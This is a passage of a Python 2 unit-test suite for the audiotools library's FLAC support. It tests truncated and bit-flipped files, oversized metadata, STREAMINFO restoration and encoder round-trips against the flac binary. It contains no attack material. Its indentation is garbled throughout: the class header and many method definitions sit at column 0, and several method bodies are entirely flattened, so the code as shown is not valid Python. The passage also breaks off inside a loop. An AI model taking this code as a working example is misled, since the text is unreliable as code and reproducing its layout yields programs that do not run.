        try:
            track = self.audio_class.from_pcm(
                temp.name,
                BLANK_PCM_Reader(1))
            good_data = open(temp.name, 'rb').read()
            f = open(temp.name, 'wb')
            f.write(good_data[0:-10])
            f.close()
            reader = track.to_pcm()
            self.assertNotEqual(reader, None)
            self.assertRaises(IOError,
                              audiotools.transfer_framelist_data,
                              reader, lambda x: x)
        finally:
            temp.close()

        #test convert() error
        temp = tempfile.NamedTemporaryFile(
            suffix="." + self.audio_class.SUFFIX)
        try:
            track = self.audio_class.from_pcm(
                temp.name,
                BLANK_PCM_Reader(1))
            good_data = open(temp.name, 'rb').read()
            f = open(temp.name, 'wb')
            f.write(good_data[0:-10])
            f.close()
            if (os.path.isfile("dummy.wav")):
                os.unlink("dummy.wav")
            self.assertEqual(os.path.isfile("dummy.wav"), False)
            self.assertRaises(audiotools.EncodingError,
                              track.convert,
                              "dummy.wav",
                              audiotools.WaveAudio)
            #a failed convert() must not leave a partial output file behind
            self.assertEqual(os.path.isfile("dummy.wav"), False)
        finally:
            temp.close()
class FlacFileTest(TestForeignAiffChunks,
TestForeignWaveChunks,
LosslessFileTest):
def setUp(self):
    """Configure FLAC class, codec hooks and encoding presets."""
    self.audio_class = audiotools.FlacAudio
    self.suffix = "." + self.audio_class.SUFFIX

    from audiotools.decoders import FlacDecoder
    from audiotools.encoders import encode_flac

    self.decoder = FlacDecoder
    self.encode = encode_flac

    #encoding presets from fastest (small blocks, no LPC)
    #to most thorough (large blocks, high LPC order,
    #mid-side and exhaustive model search)
    self.encode_opts = [{"block_size":1152,
                         "max_lpc_order":0,
                         "min_residual_partition_order":0,
                         "max_residual_partition_order":3},
                        {"block_size":1152,
                         "max_lpc_order":0,
                         "adaptive_mid_side":True,
                         "min_residual_partition_order":0,
                         "max_residual_partition_order":3},
                        {"block_size":1152,
                         "max_lpc_order":0,
                         "exhaustive_model_search":True,
                         "min_residual_partition_order":0,
                         "max_residual_partition_order":3},
                        {"block_size":4096,
                         "max_lpc_order":6,
                         "min_residual_partition_order":0,
                         "max_residual_partition_order":4},
                        {"block_size":4096,
                         "max_lpc_order":8,
                         "adaptive_mid_side":True,
                         "min_residual_partition_order":0,
                         "max_residual_partition_order":4},
                        {"block_size":4096,
                         "max_lpc_order":8,
                         "mid_side":True,
                         "min_residual_partition_order":0,
                         "max_residual_partition_order":5},
                        {"block_size":4096,
                         "max_lpc_order":8,
                         "mid_side":True,
                         "min_residual_partition_order":0,
                         "max_residual_partition_order":6},
                        {"block_size":4096,
                         "max_lpc_order":8,
                         "mid_side":True,
                         "exhaustive_model_search":True,
                         "min_residual_partition_order":0,
                         "max_residual_partition_order":6},
                        {"block_size":4096,
                         "max_lpc_order":12,
                         "mid_side":True,
                         "exhaustive_model_search":True,
                         "min_residual_partition_order":0,
                         "max_residual_partition_order":6}]
@FORMAT_FLAC
def test_init(self):
    """Opening missing or invalid files must fail cleanly."""
    # a nonexistent path raises InvalidFLAC
    self.assertRaises(audiotools.flac.InvalidFLAC,
                      audiotools.FlacAudio,
                      "/dev/null/foo")

    # a file whose contents aren't FLAC at all also raises InvalidFLAC
    invalid_file = tempfile.NamedTemporaryFile(suffix=".flac")
    try:
        invalid_file.write("invalidstringxxx")
        invalid_file.flush()
        self.assertRaises(audiotools.flac.InvalidFLAC,
                          audiotools.FlacAudio,
                          invalid_file.name)
    finally:
        invalid_file.close()

    # decoder constructor errors,
    # mostly to ensure a failed init doesn't make Python explode
    self.assertRaises(TypeError, self.decoder)
    self.assertRaises(TypeError, self.decoder, None)
    self.assertRaises(ValueError, self.decoder, "/dev/null", -1)
    self.assertRaises(ValueError, self.decoder, "/dev/null", 0x3, -1)
@FORMAT_FLAC
def test_metadata2(self):
    """FLAC metadata edge cases.

    Checks that images with descriptions round-trip, that oversized
    image and comment blocks don't corrupt the audio stream (verified
    by comparing PCM MD5 sums before and after each change), and that
    the VORBIS_COMMENT vendor string can't be altered via
    set_metadata().
    """
    temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
    try:
        track = self.audio_class.from_pcm(temp.name,
                                          BLANK_PCM_Reader(1))

        #check that a non-cover image with a description round-trips
        m = audiotools.MetaData()
        m.add_image(audiotools.Image.new(
            TEST_COVER1, u'Unicode \u3057\u3066\u307f\u308b', 1))
        track.set_metadata(m)
        new_track = audiotools.open(track.filename)
        m2 = new_track.get_metadata()

        self.assertEqual(m.images()[0], m2.images()[0])

        #baseline PCM checksum to compare against after metadata edits
        orig_md5 = md5()
        pcm = track.to_pcm()
        audiotools.transfer_framelist_data(pcm, orig_md5.update)
        pcm.close()

        #add an image too large to fit into a FLAC metadata chunk
        metadata = track.get_metadata()
        metadata.add_image(
            audiotools.Image.new(HUGE_BMP.decode('bz2'), u'', 0))

        track.update_metadata(metadata)

        #ensure that setting the metadata doesn't break the file
        new_md5 = md5()
        pcm = track.to_pcm()
        audiotools.transfer_framelist_data(pcm, new_md5.update)
        pcm.close()

        self.assertEqual(orig_md5.hexdigest(),
                         new_md5.hexdigest())

        #ensure that setting fresh oversized metadata
        #doesn't break the file
        metadata = audiotools.MetaData()
        metadata.add_image(
            audiotools.Image.new(HUGE_BMP.decode('bz2'), u'', 0))

        track.set_metadata(metadata)

        new_md5 = md5()
        pcm = track.to_pcm()
        audiotools.transfer_framelist_data(pcm, new_md5.update)
        pcm.close()

        self.assertEqual(orig_md5.hexdigest(),
                         new_md5.hexdigest())

        #add a COMMENT block too large to fit into a FLAC metadata chunk
        metadata = track.get_metadata()
        metadata.comment = "QlpoOTFBWSZTWYmtEk8AgICBAKAAAAggADCAKRoBANIBAOLuSKcKEhE1okng".decode('base64').decode('bz2').decode('ascii')

        track.update_metadata(metadata)

        #ensure that setting the metadata doesn't break the file
        new_md5 = md5()
        pcm = track.to_pcm()
        audiotools.transfer_framelist_data(pcm, new_md5.update)
        pcm.close()

        self.assertEqual(orig_md5.hexdigest(),
                         new_md5.hexdigest())

        #ensure that setting fresh oversized metadata
        #doesn't break the file
        metadata = audiotools.MetaData(
            comment="QlpoOTFBWSZTWYmtEk8AgICBAKAAAAggADCAKRoBANIBAOLuSKcKEhE1okng".decode('base64').decode('bz2').decode('ascii'))

        track.set_metadata(metadata)

        new_md5 = md5()
        pcm = track.to_pcm()
        audiotools.transfer_framelist_data(pcm, new_md5.update)
        pcm.close()

        self.assertEqual(orig_md5.hexdigest(),
                         new_md5.hexdigest())

        track.set_metadata(audiotools.MetaData(track_name=u"Testing"))

        #ensure that vendor_string isn't modified by setting metadata
        metadata = track.get_metadata()
        self.assert_(metadata is not None)
        self.assertEqual(metadata.track_name, u"Testing")
        self.assert_(
            metadata.get_block(audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID)
            is not None)
        vorbis_comment = metadata.get_blocks(
            audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID)
        proper_vendor_string = vorbis_comment[0].vendor_string
        vorbis_comment[0].vendor_string = u"Different String"
        metadata.replace_blocks(audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID,
                                vorbis_comment)
        track.set_metadata(metadata)
        vendor_string = track.get_metadata().get_block(
            audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID).vendor_string
        #set_metadata() should have restored the original vendor string
        self.assertEqual(vendor_string, proper_vendor_string)

        #FIXME - ensure that channel mask isn't modified
        #by setting metadata
    finally:
        temp.close()
@FORMAT_FLAC
def test_update_metadata(self):
    """STREAMINFO side data handling.

    set_metadata() must restore bogus STREAMINFO fields to their
    original values, while update_metadata() must write them verbatim.
    """
    #build a temporary file
    temp = tempfile.NamedTemporaryFile(suffix=".flac")
    try:
        temp.write(open("flac-allframes.flac", "rb").read())
        temp.flush()
        flac_file = audiotools.open(temp.name)

        #attempt to adjust its metadata with bogus side data fields
        metadata = flac_file.get_metadata()
        streaminfo = metadata.get_block(audiotools.flac.Flac_STREAMINFO.BLOCK_ID)

        #remember the real values so they can be compared later
        minimum_block_size = streaminfo.minimum_block_size
        maximum_block_size = streaminfo.maximum_block_size
        minimum_frame_size = streaminfo.minimum_frame_size
        maximum_frame_size = streaminfo.maximum_frame_size
        sample_rate = streaminfo.sample_rate
        channels = streaminfo.channels
        bits_per_sample = streaminfo.bits_per_sample
        total_samples = streaminfo.total_samples
        md5sum = streaminfo.md5sum

        #overwrite every field with bogus values
        streaminfo.minimum_block_size = 1
        streaminfo.maximum_block_size = 10
        streaminfo.minimum_frame_size = 2
        streaminfo.maximum_frame_size = 11
        streaminfo.sample_rate = 96000
        streaminfo.channels = 4
        streaminfo.bits_per_sample = 24
        streaminfo.total_samples = 96000
        streaminfo.md5sum = chr(1) * 16

        metadata.replace_blocks(audiotools.flac.Flac_STREAMINFO.BLOCK_ID,
                                [streaminfo])

        #ensure that set_metadata() restores fields to original values
        flac_file.set_metadata(metadata)
        metadata = flac_file.get_metadata()
        streaminfo = metadata.get_block(audiotools.flac.Flac_STREAMINFO.BLOCK_ID)

        self.assertEqual(minimum_block_size,
                         streaminfo.minimum_block_size)
        self.assertEqual(maximum_block_size,
                         streaminfo.maximum_block_size)
        self.assertEqual(minimum_frame_size,
                         streaminfo.minimum_frame_size)
        self.assertEqual(maximum_frame_size,
                         streaminfo.maximum_frame_size)
        self.assertEqual(sample_rate,
                         streaminfo.sample_rate)
        self.assertEqual(channels,
                         streaminfo.channels)
        self.assertEqual(bits_per_sample,
                         streaminfo.bits_per_sample)
        self.assertEqual(total_samples,
                         streaminfo.total_samples)
        self.assertEqual(md5sum,
                         streaminfo.md5sum)

        #adjust its metadata with new bogus side data files
        metadata = flac_file.get_metadata()
        streaminfo = metadata.get_block(audiotools.flac.Flac_STREAMINFO.BLOCK_ID)
        streaminfo.minimum_block_size = 1
        streaminfo.maximum_block_size = 10
        streaminfo.minimum_frame_size = 2
        streaminfo.maximum_frame_size = 11
        streaminfo.sample_rate = 96000
        streaminfo.channels = 4
        streaminfo.bits_per_sample = 24
        streaminfo.total_samples = 96000
        streaminfo.md5sum = chr(1) * 16

        metadata.replace_blocks(audiotools.flac.Flac_STREAMINFO.BLOCK_ID,
                                [streaminfo])

        #ensure that update_metadata() uses the bogus side data
        flac_file.update_metadata(metadata)
        metadata = flac_file.get_metadata()
        streaminfo = metadata.get_block(audiotools.flac.Flac_STREAMINFO.BLOCK_ID)

        self.assertEqual(streaminfo.minimum_block_size, 1)
        self.assertEqual(streaminfo.maximum_block_size, 10)
        self.assertEqual(streaminfo.minimum_frame_size, 2)
        self.assertEqual(streaminfo.maximum_frame_size, 11)
        self.assertEqual(streaminfo.sample_rate, 96000)
        self.assertEqual(streaminfo.channels, 4)
        self.assertEqual(streaminfo.bits_per_sample, 24)
        self.assertEqual(streaminfo.total_samples, 96000)
        self.assertEqual(streaminfo.md5sum, chr(1) * 16)
    finally:
        temp.close()
@FORMAT_FLAC
def test_verify(self):
    """Corrupted FLAC files must be detected.

    Exercises truncation at every length, single-bit flips past the
    metadata header, short headers, mismatched STREAMINFO fields, and
    convert() from a truncated file.  Offset 0x2A marks the end of the
    reference file's STREAMINFO header.
    """
    self.assertEqual(audiotools.open("flac-allframes.flac").__md5__,
                     'f53f86876dcd7783225c93ba8a938c7d'.decode('hex'))

    flac_data = open("flac-allframes.flac", "rb").read()

    self.assertEqual(audiotools.open("flac-allframes.flac").verify(),
                     True)

    #try changing the file underfoot
    temp = tempfile.NamedTemporaryFile(suffix=".flac")
    try:
        temp.write(flac_data)
        temp.flush()
        flac_file = audiotools.open(temp.name)
        self.assertEqual(flac_file.verify(), True)

        #any truncation must fail verify()
        for i in xrange(0, len(flac_data)):
            f = open(temp.name, "wb")
            f.write(flac_data[0:i])
            f.close()
            self.assertRaises(audiotools.InvalidFile,
                              flac_file.verify)

        #any single flipped bit past the header must fail verify()
        for i in xrange(0x2A, len(flac_data)):
            for j in xrange(8):
                new_data = list(flac_data)
                new_data[i] = chr(ord(new_data[i]) ^ (1 << j))
                f = open(temp.name, "wb")
                f.write("".join(new_data))
                f.close()
                self.assertRaises(audiotools.InvalidFile,
                                  flac_file.verify)
    finally:
        temp.close()

    #check a FLAC file with a short header
    temp = tempfile.NamedTemporaryFile(suffix=".flac")
    try:
        for i in xrange(0, 0x2A):
            temp.seek(0, 0)
            temp.write(flac_data[0:i])
            temp.flush()
            self.assertEqual(os.path.getsize(temp.name), i)
            #fewer than 4 bytes means even the file type can't be read
            if (i < 4):
                self.assertEqual(
                    audiotools.file_type(open(temp.name, "rb")),
                    None)
            self.assertRaises(IOError,
                              audiotools.decoders.FlacDecoder,
                              temp.name, 1)
    finally:
        temp.close()

    #check a FLAC file that's been truncated
    temp = tempfile.NamedTemporaryFile(suffix=".flac")
    try:
        for i in xrange(0x2A, len(flac_data)):
            temp.seek(0, 0)
            temp.write(flac_data[0:i])
            temp.flush()
            self.assertEqual(os.path.getsize(temp.name), i)
            decoder = audiotools.open(temp.name).to_pcm()
            self.assertNotEqual(decoder, None)
            self.assertRaises(IOError,
                              audiotools.transfer_framelist_data,
                              decoder, lambda x: x)

            self.assertRaises(audiotools.InvalidFile,
                              audiotools.open(temp.name).verify)
    finally:
        temp.close()

    #test a FLAC file with a single swapped bit
    temp = tempfile.NamedTemporaryFile(suffix=".flac")
    try:
        for i in xrange(0x2A, len(flac_data)):
            for j in xrange(8):
                bytes = map(ord, flac_data[:])
                bytes[i] ^= (1 << j)
                temp.seek(0, 0)
                temp.write("".join(map(chr, bytes)))
                temp.flush()
                self.assertEqual(len(flac_data),
                                 os.path.getsize(temp.name))
                decoders = audiotools.open(temp.name).to_pcm()
                try:
                    self.assertRaises(ValueError,
                                      audiotools.transfer_framelist_data,
                                      decoders, lambda x: x)
                except IOError:
                    #Randomly swapping bits may send the decoder
                    #off the end of the stream before triggering
                    #a CRC-16 error.
                    #We simply need to catch that case and continue on.
                    continue
    finally:
        temp.close()

    #test a FLAC file with an invalid STREAMINFO block
    #each tuple has exactly one field that disagrees with the stream
    mismatch_streaminfos = [
        (4096, 4096, 12, 12, 44101, 0, 15, 80,
         '\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8c}'),
        (4096, 4096, 12, 12, 44100, 1, 15, 80,
         '\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8c}'),
        (4096, 4096, 12, 12, 44100, 0, 7, 80,
         '\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8c}'),
        (4096, 1, 12, 12, 44100, 0, 15, 80,
         '\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8c}'),
        (4096, 4096, 12, 12, 44100, 0, 15, 80,
         '\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8d}')]

    header = flac_data[0:8]
    data = flac_data[0x2A:]

    from audiotools.bitstream import BitstreamWriter

    for streaminfo in mismatch_streaminfos:
        temp = tempfile.NamedTemporaryFile(suffix=".flac")
        try:
            temp.seek(0, 0)
            temp.write(header)
            #rebuild the STREAMINFO block with the mismatched fields
            BitstreamWriter(temp.file, 0).build(
                "16u 16u 24u 24u 20u 3u 5u 36U 16b",
                streaminfo)
            temp.write(data)
            temp.flush()
            decoders = audiotools.open(temp.name).to_pcm()
            self.assertRaises(ValueError,
                              audiotools.transfer_framelist_data,
                              decoders, lambda x: x)
        finally:
            temp.close()

    #test that convert() from an invalid file also raises an exception
    temp = tempfile.NamedTemporaryFile(suffix=".flac")
    try:
        temp.write(flac_data[0:-10])
        temp.flush()
        flac = audiotools.open(temp.name)
        if (os.path.isfile("dummy.wav")):
            os.unlink("dummy.wav")
        self.assertEqual(os.path.isfile("dummy.wav"), False)
        self.assertRaises(audiotools.EncodingError,
                          flac.convert,
                          "dummy.wav",
                          audiotools.WaveAudio)
        #a failed convert() must not leave a partial output file behind
        self.assertEqual(os.path.isfile("dummy.wav"), False)
    finally:
        temp.close()
    def __stream_variations__(self):
        """yield a fresh set of sine-based PCMReader test streams

        covers 8, 16 and 24 bits-per-sample in mono, stereo
        and 3 to 6 channel layouts at several sample rates,
        for exercising FLAC encode/decode round-trips
        """
        for stream in [
            test_streams.Sine8_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
            test_streams.Sine8_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
            test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
            test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
            test_streams.Sine8_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
            test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
            test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
            test_streams.Sine8_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
            test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
            test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
            test_streams.Sine16_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
            test_streams.Sine16_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
            test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
            test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
            test_streams.Sine16_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
            test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
            test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
            test_streams.Sine16_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
            test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
            test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
            test_streams.Sine24_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
            test_streams.Sine24_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
            test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
            test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
            test_streams.Sine24_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
            test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
            test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
            test_streams.Sine24_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
            test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
            test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
            test_streams.Simple_Sine(200000, 44100, 0x7, 8,
                                     (25, 10000),
                                     (50, 20000),
                                     (120, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x33, 8,
                                     (25, 10000),
                                     (50, 20000),
                                     (75, 30000),
                                     (65, 40000)),
            test_streams.Simple_Sine(200000, 44100, 0x37, 8,
                                     (25, 10000),
                                     (35, 15000),
                                     (45, 20000),
                                     (50, 25000),
                                     (55, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x3F, 8,
                                     (25, 10000),
                                     (45, 15000),
                                     (65, 20000),
                                     (85, 25000),
                                     (105, 30000),
                                     (120, 35000)),
            test_streams.Simple_Sine(200000, 44100, 0x7, 16,
                                     (6400, 10000),
                                     (12800, 20000),
                                     (30720, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x33, 16,
                                     (6400, 10000),
                                     (12800, 20000),
                                     (19200, 30000),
                                     (16640, 40000)),
            test_streams.Simple_Sine(200000, 44100, 0x37, 16,
                                     (6400, 10000),
                                     (8960, 15000),
                                     (11520, 20000),
                                     (12800, 25000),
                                     (14080, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x3F, 16,
                                     (6400, 10000),
                                     (11520, 15000),
                                     (16640, 20000),
                                     (21760, 25000),
                                     (26880, 30000),
                                     (30720, 35000)),
            test_streams.Simple_Sine(200000, 44100, 0x7, 24,
                                     (1638400, 10000),
                                     (3276800, 20000),
                                     (7864320, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x33, 24,
                                     (1638400, 10000),
                                     (3276800, 20000),
                                     (4915200, 30000),
                                     (4259840, 40000)),
            test_streams.Simple_Sine(200000, 44100, 0x37, 24,
                                     (1638400, 10000),
                                     (2293760, 15000),
                                     (2949120, 20000),
                                     (3276800, 25000),
                                     (3604480, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x3F, 24,
                                     (1638400, 10000),
                                     (2949120, 15000),
                                     (4259840, 20000),
                                     (5570560, 25000),
                                     (6881280, 30000),
                                     (7864320, 35000))]:
            yield stream
@FORMAT_FLAC
def test_streams(self):
for g in self.__stream_variations__():
md5sum = md5()
f = g.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum.update(f.to_bytes(False, True))
f = g.read(audiotools.FRAMELIST_SIZE)
self.assertEqual(md5sum.digest(), g.digest())
g.close()
    def __test_reader__(self, pcmreader, **encode_options):
        """encode pcmreader to a temporary FLAC file with the given
        options, then check the result against both the reference
        flac(1) binary and our own decoder

        readers with a "digest" method also have their
        stored STREAMINFO MD5 sum compared against it"""
        if (not audiotools.BIN.can_execute(audiotools.BIN["flac"])):
            #hard failure rather than skip if the reference binary is absent
            self.assert_(False,
                         "reference FLAC binary flac(1) required for this test")
        temp_file = tempfile.NamedTemporaryFile(suffix=".flac")
        self.encode(temp_file.name,
                    audiotools.BufferedPCMReader(pcmreader),
                    **encode_options)
        #"-ts" performs a silent test-decode of the whole stream
        self.assertEqual(subprocess.call([audiotools.BIN["flac"], "-ts",
                                          temp_file.name]),
                         0,
                         "flac decode error on %s with options %s" % \
                             (repr(pcmreader),
                              repr(encode_options)))
        flac = audiotools.open(temp_file.name)
        self.assert_(flac.total_frames() > 0)
        if (hasattr(pcmreader, "digest")):
            self.assertEqual(flac.__md5__, pcmreader.digest())
        #decode with our own decoder and compare PCM MD5 sums
        md5sum = md5()
        d = self.decoder(temp_file.name, pcmreader.channel_mask)
        f = d.read(audiotools.FRAMELIST_SIZE)
        while (len(f) > 0):
            md5sum.update(f.to_bytes(False, True))
            f = d.read(audiotools.FRAMELIST_SIZE)
        d.close()
        self.assertEqual(md5sum.digest(), pcmreader.digest())
        temp_file.close()
@FORMAT_FLAC
def test_small_files(self):
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
self.__test_reader__(g(44100),
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
@FORMAT_FLAC
def test_full_scale_deflection(self):
for (bps, fsd) in [(8, test_streams.fsd8),
(16, test_streams.fsd16),
(24, test_streams.fsd24)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
self.__test_reader__(
test_streams.MD5Reader(fsd(pattern, 100)),
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
@FORMAT_FLAC
def test_sines(self):
import sys
for g in self.__stream_variations__():
self.__test_reader__(g,
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
@FORMAT_FLAC
def test_wasted_bps(self):
self.__test_reader__(test_streams.WastedBPS16(1000),
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
    @FORMAT_FLAC
    def test_blocksizes(self):
        """exercise very small block sizes against a range of
        LPC orders, with and without certain subframe types"""
        #FIXME - handle 8bps/24bps also
        noise = struct.unpack(">32h", os.urandom(64))
        encoding_args = {"min_residual_partition_order": 0,
                         "max_residual_partition_order": 6,
                         "mid_side": True,
                         "adaptive_mid_side": True,
                         "exhaustive_model_search": True}
        for to_disable in [[],
                           ["disable_verbatim_subframes",
                            "disable_constant_subframes"],
                           ["disable_verbatim_subframes",
                            "disable_constant_subframes",
                            "disable_fixed_subframes"]]:
            for block_size in [16, 17, 18, 19, 20, 21, 22, 23,
                               24, 25, 26, 27, 28, 29, 30, 31, 32, 33]:
                for lpc_order in [0, 1, 2, 3, 4, 5, 7, 8, 9, 15, 16, 17,
                                  31, 32]:
                    #fresh copy per pass so disabled flags don't accumulate
                    args = encoding_args.copy()
                    for disable in to_disable:
                        args[disable] = True
                    args["block_size"] = block_size
                    args["max_lpc_order"] = lpc_order
                    self.__test_reader__(test_streams.MD5Reader(
                        test_streams.FrameListReader(noise,
                                                     44100, 1, 16)),
                        **args)
@FORMAT_FLAC
def test_frame_header_variations(self):
max_lpc_order = 16
self.__test_reader__(test_streams.Sine16_Mono(200000, 96000,
441.0, 0.61, 661.5, 0.37),
block_size=max_lpc_order,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
self.__test_reader__(test_streams.Sine16_Mono(200000, 96000,
441.0, 0.61, 661.5, 0.37),
block_size=65535,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
self.__test_reader__(test_streams.Sine16_Mono(200000, 9,
441.0, 0.61, 661.5, 0.37),
block_size=1152,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
self.__test_reader__(test_streams.Sine16_Mono(200000, 90,
441.0, 0.61, 661.5, 0.37),
block_size=1152,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
self.__test_reader__(test_streams.Sine16_Mono(200000, 90000,
441.0, 0.61, 661.5, 0.37),
block_size=1152,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
#the reference encoder's test_streams.sh unit test
#re-does the 9Hz/90Hz/90000Hz tests for some reason
#which I won't repeat here
    @FORMAT_FLAC
    def test_option_variations(self):
        """run each encoder option set against every stream variation"""
        #testing all the option variations
        #against all the stream variations
        #along with a few extra option variations
        #takes a *long* time - so don't panic
        for opts in self.encode_opts:
            encode_opts = opts.copy()
            for disable in [[],
                            ["disable_verbatim_subframes",
                             "disable_constant_subframes"],
                            ["disable_verbatim_subframes",
                             "disable_constant_subframes",
                             "disable_fixed_subframes"]]:
                for extra in [[],
                              #FIXME - no analogue for -p option
                              ["exhaustive_model_search"]]:
                    #NOTE(review): encode_opts is only copied once per
                    #opts, so flags set here accumulate across the inner
                    #loops rather than resetting - presumably intentional,
                    #but worth confirming
                    for d in disable:
                        encode_opts[d] = True
                    for e in extra:
                        encode_opts[e] = True
                    for g in self.__stream_variations__():
                        self.__test_reader__(g, **encode_opts)
    @FORMAT_FLAC
    def test_noise_silence(self):
        """run each encoder option set against random noise and
        pure silence in several channel/bps/blocksize combinations"""
        for opts in self.encode_opts:
            encode_opts = opts.copy()
            for disable in [[],
                            ["disable_verbatim_subframes",
                             "disable_constant_subframes"],
                            ["disable_verbatim_subframes",
                             "disable_constant_subframes",
                             "disable_fixed_subframes"]]:
                for (channels, mask) in [
                    (1, audiotools.ChannelMask.from_channels(1)),
                    (2, audiotools.ChannelMask.from_channels(2)),
                    (4, audiotools.ChannelMask.from_fields(
                        front_left=True,
                        front_right=True,
                        back_left=True,
                        back_right=True)),
                    (8, audiotools.ChannelMask(0))]:
                    for bps in [8, 16, 24]:
                        for extra in [[],
                                      #FIXME - no analogue for -p option
                                      ["exhaustive_model_search"]]:
                            for blocksize in [None, 32, 32768, 65535]:
                                #NOTE(review): as in test_option_variations,
                                #flags set on encode_opts accumulate across
